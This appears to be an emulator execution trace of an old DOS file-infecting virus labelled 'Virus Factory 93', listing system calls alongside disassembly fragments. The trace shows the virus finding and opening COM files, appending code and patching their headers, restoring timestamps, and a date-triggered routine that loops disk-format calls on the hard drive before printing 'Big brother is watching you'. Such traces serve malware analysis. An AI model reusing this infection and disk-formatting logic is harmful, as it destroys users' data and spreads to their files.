2018-12-25T12:54:10.507976996Z 59 PC: 12b03 | Change current directory
2018-12-25T12:54:10.511224515Z 42 PC: 12b07 | Get date 0x12b07: cmp dh, 0xb
0x12b0a: jne 0x12b2b
0x12b0c: mov ch, 0
0x12b0e: mov ax, 0x50d
0x12b11: mov cl, 1
0x12b13: mov dx, 0x80
0x12b16: int 0x13
0x12b18: inc ch
0x12b1a: cmp ch, 0xd
0x12b1d: loopne 0x12b0e
0x12b1f: call 0x12b64
0x12b22: mov dx, 0x2e0
0x12b25: add dx, si
0x12b27: mov ah, 9
0x12b29: int 0x21
0x12b2b: mov bx, 0x100
0x12b2e: push bx
0x12b2f: ret
0x12b30: cmp byte ptr [si + 0x2d7], 1
0x12b35: je 0x12aec
2018-12-25T12:54:10.516239081Z 9 PC: 12b2b | Display string (String= 'Big brother is watching you. Virus Factory 93 ')
2018-12-25T12:54:10.524159668Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16880,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:09.409102427Z 71 PC: 12ac3 | Get current directory
2018-12-25T12:54:09.415840063Z 47 PC: 12ac8 | Get disk transfer address
2018-12-25T12:54:09.417009864Z 26 PC: 12ad9 | Set disk transfer address
2018-12-25T12:54:09.418105731Z 78 PC: 12ae7 | Find first file
2018-12-25T12:54:09.424171921Z 67 PC: 12b85 | Get or set file attributes
2018-12-25T12:54:09.440252691Z 61 PC: 12b8c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:09.446488346Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:09.452679187Z 66 PC: 12bb4 | Move file pointer
2018-12-25T12:54:09.453962474Z 44 PC: 12bbf | Get time 0x12bbf: xor dh, dh
0x12bc1: mov cx, 0x20e
0x12bc4: add cx, dx
0x12bc6: mov dx, 0x104
0x12bc9: add dx, si
0x12bcb: mov ah, 0x40
0x12bcd: int 0x21
0x12bcf: call 0x22b47
0x12bd2: jb 0x12beb
0x12bd4: mov ax, 0x4200
0x12bd7: xor dx, dx
0x12bd9: xor cx, cx
0x12bdb: int 0x21
0x12bdd: jb 0x12beb
0x12bdf: mov ah, 0x40
0x12be1: mov dx, 0x2dc
0x12be4: add dx, si
0x12be6: mov cx, 4
0x12be9: int 0x21
0x12beb: mov ax, 0x5701
2018-12-25T12:54:09.4558377Z 64 PC: 12bcf | Write file or device (Write 600 bytes on handle 5)
2018-12-25T12:54:09.463263328Z 66 PC: 12bdd | Move file pointer
2018-12-25T12:54:09.46449687Z 64 PC: 12beb | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:09.470543997Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:54:09.471808832Z 62 PC: 12bfc | Close file
2018-12-25T12:54:09.479126844Z 67 PC: 12c0c | Get or set file attributes
2018-12-25T12:54:09.4864985Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.488897462Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.498909368Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.505150211Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.511279511Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.513543261Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.515527313Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.523164369Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.52503332Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.531915173Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.533403796Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.541765501Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.551975333Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.554485168Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.565008749Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.571397916Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.578548152Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.580367086Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.582484968Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.590380226Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.592067997Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.598303408Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.599616721Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.607362802Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.61732468Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.620182515Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.628716329Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.634339165Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.639772647Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.641238981Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.64360531Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.650664838Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.652193721Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.65829945Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.659480217Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.666057113Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.675604036Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.677858066Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.686560736Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.69223901Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.69767677Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.698829351Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.70085774Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.707696154Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.709195337Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.71492913Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.716179641Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.722977556Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.732130678Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.734368352Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.743027425Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.754134908Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.759950012Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.762131463Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.765133913Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.773022871Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.77435852Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.781521562Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.783206669Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.790149916Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.79934434Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.80156729Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.809886281Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.816564897Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.822099213Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:54:09.823453178Z 44 PC: 12bbf | Get time (See above)
2018-12-25T12:54:09.825688294Z 64 PC: 12bcf | Write file or device (See above)
2018-12-25T12:54:09.832548887Z 66 PC: 12bdd | Move file pointer (See above)
2018-12-25T12:54:09.83369842Z 64 PC: 12beb | Write file or device (See above)
2018-12-25T12:54:09.840376725Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.841709931Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.848379805Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.858152391Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.860717682Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.870359096Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.877597474Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.884183176Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.885801669Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.892969888Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.903175304Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.905386896Z 59 PC: 12b40 | Change current directory
2018-12-25T12:54:09.910088772Z 78 PC: 12ae7 | Find first file (See above)
2018-12-25T12:54:09.916139367Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.928026931Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.939073913Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.945323903Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.946771314Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.954226895Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:09.963767129Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:09.966230296Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:09.975944986Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:09.982347969Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:09.988860056Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:09.990663874Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:09.999728976Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.012009779Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.014670703Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.027150939Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.032934507Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.038888527Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.040183453Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.046299323Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.055157518Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.057491681Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.068402826Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.075151692Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.081003951Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.08280094Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.090401141Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.100574648Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.103455946Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.113983074Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.12577618Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.132490953Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.134189599Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.141633181Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.15117596Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.153538966Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.163111259Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.169386969Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.175452675Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.176956248Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.185748784Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.197843976Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.200904181Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.210125775Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.216396769Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.222562427Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.223874157Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.230791486Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.240336833Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.242710504Z 67 PC: 12b85 | Get or set file attributes (See above)
2018-12-25T12:54:10.25487129Z 61 PC: 12b8c | Open file (See above)
2018-12-25T12:54:10.261796953Z 63 PC: 12b9b | Read file or device (See above)
2018-12-25T12:54:10.267857832Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:54:10.269198269Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:54:10.27622851Z 67 PC: 12c0c | Get or set file attributes (See above)
2018-12-25T12:54:10.285454872Z 79 PC: 12ae7 | Find next file (See above)
2018-12-25T12:54:10.287599462Z 26 PC: 12af9 | Set disk transfer address
2018-12-25T12:54:10.288538116Z 59 PC: 12b03 | Change current directory
2018-12-25T12:54:10.290023847Z 42 PC: 12b07 | Get date 0x12b07: cmp dh, 0xb
0x12b0a: jne 0x12b2b
0x12b0c: mov ch, 0
0x12b0e: mov ax, 0x50d
0x12b11: mov cl, 1
0x12b13: mov dx, 0x80
0x12b16: int 0x13
0x12b18: inc ch
0x12b1a: cmp ch, 0xd
0x12b1d: loopne 0x12b0e
0x12b1f: call 0x12b64
0x12b22: mov dx, 0x2e0
0x12b25: add dx, si
0x12b27: mov ah, 9
0x12b29: int 0x21
0x12b2b: mov bx, 0x100
0x12b2e: push bx
0x12b2f: ret
0x12b30: cmp byte ptr [si + 0x2d7], 1
0x12b35: je 0x12aec
2018-12-25T12:54:10.291944482Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')